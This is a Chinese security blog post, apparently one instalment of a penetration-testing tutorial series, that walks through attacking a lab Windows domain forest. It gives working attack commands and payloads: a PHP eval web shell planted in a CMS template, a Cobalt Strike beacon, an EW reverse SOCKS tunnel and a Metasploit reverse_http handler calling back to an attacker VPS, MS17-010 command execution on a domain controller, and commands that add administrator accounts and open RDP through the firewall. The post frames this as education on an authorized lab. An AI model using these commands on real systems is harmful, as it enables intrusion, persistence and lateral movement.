freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

渗透测试之地基内网篇:域森林中实战攻防(上)
2021-06-30 12:22:08

系列文章

专辑:渗透测试之地基篇

简介

渗透测试-地基篇

该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。

请注意

本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。

名言:

你对这行的兴趣,决定你在这行的成就!

一、前言

渗透测试人员需谨记《网络安全法》,根据《网络安全法》所示,未经授权的渗透测试都是不合法的,不管是出于何种目的。红队渗透人员在进行渗透期间,渗透测试的行为和项目必须在被渗透方授予权限可渗透后,才可进行渗透测试操作。

如今有一家dayu公司,需要对自己的业务以及整体的内网框架体系进行隐患挖掘,授予权限我进行对dayu公司的渗透测试操作,在签署了双方的《渗透测试授权书》后,我开始了对dayu公司的渗透之旅。

跳开思维讲,我此篇内容是内网渗透篇章,通过我的专栏:

社工钓鱼 -> 免杀过全杀软 -> 内网渗透 

那么我通过了社工钓鱼的各种方式,将钓鱼文件进行免杀后,成功钓鱼到了该公司外围人员计算机,并控制了该计算机权限获得shell,并成功登录对方电脑。

通过前期对域用户大量的信息收集,画出了相对应的简单网络拓扑图,下一步需要进攻子域控制器,思路如下:

域普通用户 -> 子域控制器 -> 父域控制器 -> 辅域控制器 -> 财务独立域 -> 涉密系统

通过该思路进攻即可,还有另外一条思路:

域普通用户 -> 10.10.21.0/24二级区域 -> 父子域控制器 -> 横向延伸(财务独立域10.10.21.0/24)

渗透人员最爱系统之一有kali,还有各类windows集成的武器库系统,通过前几期的域森林专辑文章中利用隐藏通道技术、权限提升、横向攻击、域控安全技术、跨域攻击、置零攻击等手段对公司进行了大面积渗透行为,今天我们就来对域森林中进行实战攻防演练,利用前期学到的方法在内网中遨游!

二、环境介绍

目前信息收集获得的网络情况:(模拟环境)
拓扑图简介
1625026963_60dbf193ce42006710f4d.png!small?1625026964284为了更好的演示接下来的渗透和回看总拓扑图公司搭建环境情况:

单篇:渗透测试之地基内网篇:域森林中父子域和辅域用户搭建分析

实战是结合所有知识思路的集合体,只有实战才能检验能力的时刻,也只有实战才能更快的进步和检验错误,接下来将介绍如何一步步攻破内网域森林环境!

三、攻击Web服务器

在互联网发现一个web页面地址如下:

www.dayugs.com

开始进行授权攻击行为!

1、web登录注册点

1)发现登录注册选项:
1625026971_60dbf19b50adae21652e5.png!small?1625026978921右上角发现登录注册框!

2)尝试点击登录和注册:
1625026974_60dbf19ed2861188780cf.png!small?1625026984340该页面经过简单尝试未发现账号和密码

3)获得管理后台:
1625026980_60dbf1a4178e80085faf4.png!small?1625026985572通过简单的手动测试,发现管理登录后台:

1625026983_60dbf1a7e6b31eafdcf29.png!small?1625026985572后台地址:

http://www.dayugs.com/index.php?r=admin/index/login

开始进行YXcms的web渗透!

2、爆破用户名密码

1)利用Burpsuite抓包分析:
1625026992_60dbf1b0c035f0843f10b.png!small?1625026993967

2)burpsuit拦截请求:
1625026997_60dbf1b54cb46ea9533a3.png!small?1625026998468

3)BurpSuite进行爆破:
1625027001_60dbf1b9d084b92c7c80d.png!small?1625027003588

4)导入字典:
1625027006_60dbf1be60f04b75e5ee3.png!small?1625027007789

5)获取密码:
1625027011_60dbf1c30d5105e2984a1.png!small?1625027012169通过爆破获得用户密码:admin/123456

6)成功登录到后台:

1625027015_60dbf1c7ba5f277b86a5f.png!small?1625027016187

1625027022_60dbf1ce0ce3e9abfe233.png!small?1625027028575

版本:YxcmsApp 1.2.1 【未授权】 获取授权版. (版本较低)

3、获取webshell

1)前台模板拿shell:
1625027026_60dbf1d28d06a576c9f11.png!small?1625027028576左边选择前台模板->管理模板文件

2)管理模板文件-index_index.php:
1625027031_60dbf1d77418048507026.png!small?1625027042201选择index_index.php

3)写入一句话:
1625027036_60dbf1dc874cbe7b59be3.png!small?1625027042202顶端写入一句话到主页!

<?php @eval($_POST[123]);?>

4)保存:
1625027040_60dbf1e076001d8120284.png!small?1625027042200成功保存!

5)蚁剑测试:
1625027046_60dbf1e691a0314391aef.png!small?1625027048033

URL地址:http://www.dayugs.com/index.php
链接密码:123

通过点击测试连接,回显连接成功。

6)成功登录:
1625027050_60dbf1ea531721cf6d6fa.png!small?1625027051209点击添加后,成功获取webshell,双击后进入webshell界面。

7)在此处打开终端:
1625027054_60dbf1eeedf774456e1ee.png!small?1625027056431可看到通过简单的交互,获得终端普通用户控制权!

4、简单内网信息收集

1)简单信息收集
1625027059_60dbf1f3aeb72b6dc1968.png!small?1625027060461

hostname
whoami
arp -a

user/dayu
10.10.3.6

2)查看进程:
1625027064_60dbf1f87e531f030bbd3.png!small?1625027065546

tasklist

进程中查看是否存在杀软

3)检查是杀软:
1625027070_60dbf1feed92e575b4aec.png!small?1625027072978https://www.ddosi.com/av/1.php
无杀软!!

四、CobaltStrike后渗透

1)VPS开启teamserver
1625027075_60dbf2036d989adab78bb.png!small?1625027076399

teamserver 192.168.253.38 11111

2)运行CS:
1625027080_60dbf208090a924c1e0b8.png!small?1625027082131填写VPS主机IP、端口、默认用户名、和TEM设置的密码!

3)建立监听:

1625027085_60dbf20d4ab97d1f70cd0.png!small?1625027088075进来后需要建立监听:填写名字、HTTP-payload、HTTP-host,HTTP-port,最后点击save!

4)CS生成payload:

1625027090_60dbf212230ce00ee3989.png!small?1625027090710点击攻击->Windows Executable(S)

1625027100_60dbf21c830e7e3cbde47.png!small?1625027101667选择监听刚设置的http,根据信息收集勾选X64 payload,成功生成beacon.exe的payload!

5)成功上线:

1625027105_60dbf221abf5e841bfeb4.png!small?1625027106908通过蚁剑成功上传CS-payload!

6)执行payload:
1625027110_60dbf2269907e231078e6.png!small?1625027111311在蚁剑终端执行payload

7)成功上线CS:
1625027117_60dbf22d6634037741289.png!small?1625027124899获得低权dayu用户权限的shell!

五、提权UAC并扫描

1、利用dayu插件提权

MS14-058进行提权:
1625027121_60dbf2313a5ef51cbe803.png!small?1625027130402使用我自带的插件选择提权MS14-058!

1625027127_60dbf237d4aaab16341ea.png!small?1625027130403成功获得rundll32上线的内存system权限的shell!

2、nbtscan扫描存活

1)上传nbtscan
1625027134_60dbf23e8c58999654387.png!small?1625027143974

2)执行nbtscan
1625027139_60dbf243e0b52bb5d6caf.png!small?1625027143976

填写需要扫描的网段:
1625027144_60dbf248d69b3839c368e.png!small?1625027145304通过前期信息收集,发现10.10.3.100的内网3段存在的,对它进行探测扫描!

3)获得DC:

1625102613_60dd19156d2ed72f0923c.png!small?1625102615243发现DC域控:10.10.3.6,目标开始拿下域控机器!

六、建立代理隧道

前期需要建立代理进行内网渗透!这里选择EW进行一级代理!
FRP、SPN、EW

1)上传EW
1625027253_60dbf2b5062e435afcaa3.png!small?1625027262554通过CS->目标->文件管理上传EW代理工具到yxcms目录下!

2)公网VPS执行:
即在公网VPS上添加一个转接隧道,把1080端口收到的代理请求转发给888端口。
1625027257_60dbf2b94c0d0f2b69c5a.png!small?1625027265249

ew_for_Win.exe -s rcsocks -l 1080 -e 888

3)CS目标执行

即在IP地址为10.10.3.100的机器上启动SOCKS5服务并反弹到公网VPS的888端口:
1625027262_60dbf2be4f46d0a1be71a.png!small?1625027265250

shell ew_for_Win.exe -s rssocks -d 192.168.253.38 -e 888

成功建立一级代理!

4)Proxifier测试
1625027361_60dbf32153df02a6adb03.png!small?1625027365671通过测试,成功建立隧道代理!

七、CS联动MSF(拓展)

1)首先MSF监听:
说明下CS3版本还是存在tcp的监听,MSF设置是tcp的payload。
CS4版本取消了TCP,那么我们用HTTP的payload即可。

msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_http; set lhost 192.168.253.27; set lport 9999; exploit -j; "

1625027367_60dbf3270248ec15a92e0.png!small?1625027370174

2)CS创建一个监听器:(Host就是MSF的IP,Port就是MSF监听的端口)!

1625027373_60dbf32d64d7a8ef9b870.png!small?1625027379055

3)要让这台机器上线MSF:右键点击Spawn(增加会话)
1625027376_60dbf330dc7b59d461c05.png!small?1625027379054选择cs联动msf:
1625027382_60dbf3364c04af7acc7d8.png!small?1625027383187

4)成功联动到Kali-MSF:
1625027386_60dbf33ad91d2256a84f1.png!small?1625027389281联动后可以做路由、代理隧道等等等!

八、进攻子域控制器

目前可知域控DC:10.10.3.6

1、探测是否存在永恒之蓝

1)MSF链接EW隧道代理
1625027391_60dbf33f96a89dc7484f0.png!small?1625027392400

setg Proxies socks5:192.168.253.38:1080
setg ReverseAllowProxy true

2)扫描是否存在ms17_010

search寻找ms17_010模块:
1625027397_60dbf3452584bfcf94aa7.png!small?1625027400077

3)执行扫描脚本:

1625027401_60dbf349184c7f6cf3964.png!small?1625027402123

use auxiliary/scanner/smb/smb_ms17_010
set rhosts 10.10.3.6

4)执行:
1625027405_60dbf34dddccc2503c78c.png!small?1625027417891发现VULNERABLE存在ms17_010永恒之蓝漏洞,对方机器是Windows Server 2016系统!

2、利用MS17_010

1)ms17_010的command攻击
1625027413_60dbf3550e8211f06bcca.png!small?1625027421701

用exp直接打无法打下!

2)command脚本攻击:
1625027416_60dbf3588f46b0d99d7d8.png!small?1625027426828

use auxiliary/admin/smb/ms17_010_command
set rhosts 10.10.3.6
set command whoami

成功利用commed攻击子域控制器!

3、创建域管理员用户

1)创建域控用户
1625027422_60dbf35e65cc94f91c919.png!small?1625027431665

net user testq QWEasd123 /add /domain

2)将用户加入域管组:
1625027427_60dbf3632cbc7bb41adce.png!small?1625027434274

net group "Domain Admins" testq /add /domain

3)检查用户情况:

1625027430_60dbf366e6fe93efe16ac.png!small?1625027434276

set command net user testq

未成功加入Domain admin组!无法加入组是无权限登录和操作的!

4、子域开启3389

1)设置远程桌面端口:
1625102668_60dd194c4c17349ab98d3.png!small?1625102672999

set command "reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f"

2)开启远程桌面:
1625102678_60dd1956bec761cbae9b8.png!small?1625102682308

set command "wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1"

3)防火墙允许放行3389:
1625102684_60dd195c7f882031766ad.png!small?1625102689662

set command "netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow"

成功开启RDP远程桌面!

5、登录子域桌面

1)windows配置proxifier
1625102689_60dd1961f1d04d82b8058.png!small?1625102691840

2)远程登录桌面:
1625102695_60dd19673bd53a1b436a5.png!small?1625102697516

xiyou1\testq

这里发现登录失败!因为未能testq加入domain admin组!无法远程!

6、子域上线CS-payload生成

1)建立中转监听:
1625102700_60dd196c66e33e8a098e2.png!small?1625102701273

2)填写跳板信息:
1625102705_60dd19710a14fde4b56c9.png!small?1625102707459

3)生成exe-payload:
1625102709_60dd19758ee9a6f66f327.png!small?1625102716474

7、创建普通域用户开启3389

1)普域用户创建

1625102714_60dd197a9de98e3590227.png!small?16251027164741625102720_60dd1980cc7777aca4d16.png!small?1625102722722

shell net user test1 QWEasd123 /add
shell net localgroup administrators test1 /add
shell net user test1

2)开启远程登录普域用户:
1625102727_60dd1987558a47d41225c.png!small?16251027305451625102731_60dd198bdc3c6eb4ed92f.png!small?1625102733415成功开启!!

3)成功登录:
1625102736_60dd1990abd505a66cd35.png!small?16251027372431625102741_60dd19959f3080c104800.png!small?1625102742113

通过尝试建立IPC,虽然成功了,但是无权限操作读取share目录的!!

九、总结

通过web渗透 -> webshell -> CS后渗透 -> socks5建立 -> MSF联动 -> MS17_010最后进攻子域控制器目前子域控制器无法拿下在实战攻防中篇章会介绍如何继续进攻!希望小伙伴们学到更多的技术!加油~

公司域森林搭建 -> 域森林信息收集上 -> 域森林信息收集下 -> 域森林通信隧道建立上 -> 域森林通信隧道建立下 -> 域森林中权限提升上 -> 域森林中权限提升中 -> 域森林中权限提升下 -> 域森林中横向移动(上)-> 域森林中横向移动(中)-> 域森林中横向移动(下)-> 域森林中域控制安全(上)-> 域森林中域控制安全(下)-> 域森林中跨域攻击(总)-> 域森林中置零攻击(总)-> 域森林中权限维持(上)-> 域森林中权限维持(中)-> 域森林中权限维持(下)-> 域森林中实战攻防(上)......

接下来在《域森林中实战攻防(中)》中会接触到如何通过置零攻击拿下子域控制器在建立二级socks5代理打财务系统的,请看下篇域森林中实战攻防中篇章!

希望大家提高安全意识,没有网络安全就没有国家安全!

今天基础牢固就到这里,虽然基础,但是必须牢记于心。

作者:大余

# web安全 # 实战攻防
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录